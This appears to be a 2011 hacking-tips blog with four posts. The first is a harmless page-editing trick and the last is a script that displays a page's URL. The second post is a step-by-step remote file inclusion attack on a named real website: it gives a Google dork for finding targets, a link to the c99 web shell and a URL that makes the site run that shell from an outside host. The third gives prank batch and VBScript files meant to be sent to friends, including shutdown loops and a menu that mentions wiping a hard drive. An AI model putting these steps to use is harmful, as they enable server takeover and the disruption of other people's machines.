Sunday 27 February 2011

How to Pretend to Hack a Website funny

1. Go to the page you want to hack and wait for it to be loaded fully. If you do it before, it will only edit what has already loaded.





2.
Copy this code into the url bar.

javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0

3. Hit go! If it worked right the links will have turned a more saturated blue, and when you click somewhere you'll be able to edit text

4.
Once you have made the page uneditable again, left-click in the URL Bar and press ESC. This will reset the URL to the page you are on, making it look authentic!
Happy Hacking:ppy Hacking:

Note: This does not really affect the website content at all. What you change is only visible on your computer. Then as soon as you refresh the page it will be back to normal for you too.
Posted by at No comments:

Hack a Website Using Remote File Inclusion



Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.



Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything 

To find the vulnerability the hacker will most commonly  use the following Google Dork

�inurl:index.php?page=�

This will show all the pages which has �index.php?page=� in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com

So the hacker url will become:::


http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack



Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

http://h1.ripway.com/anshumankak/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/anshumankak/c99.txt?

Remember to add �?� at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it
Happy Hacking.....?

Posted: Anshuman Kak
Posted by at No comments:

Friday 18 February 2011

Freaking Your Friends With Harmless Computer Virus | Can ByPass Antivirus

Hi! This is Anshuman kak again with new hack and cracks ...........??



1) Convey your friend a little message and shut down his / her computer:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

2) Toggle your friend's Caps Lock button simultaneously:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:


1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.
Posted by at No comments:

Wednesday 16 February 2011

How To Find a Spoofed Website With A Javascript



Javascript is an inferior language but Javascript is an extremly powerful language and those people who think the other way they either don't know how to use it or are not familiar with it's capabilities, With javascript you can do lots of cool things such as edit any page, make an image fly etc, but it is a waste of time to spend your time on making images fly with javascripts or editing a page.
Anyways coming to the main topic, did you know that javascript can be used to detect if a page is a spoofed website or phishing website or a legit one, well if you don't know just paste the following code in to the address bar and a pop up will appear telling you whether the website is original or not....

Here is the Javascript code:


javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof."); 

(Just copy from here and paste it in ur URL Bar.) 





Posted by at No comments:
Subscribe to: Posts (Atom)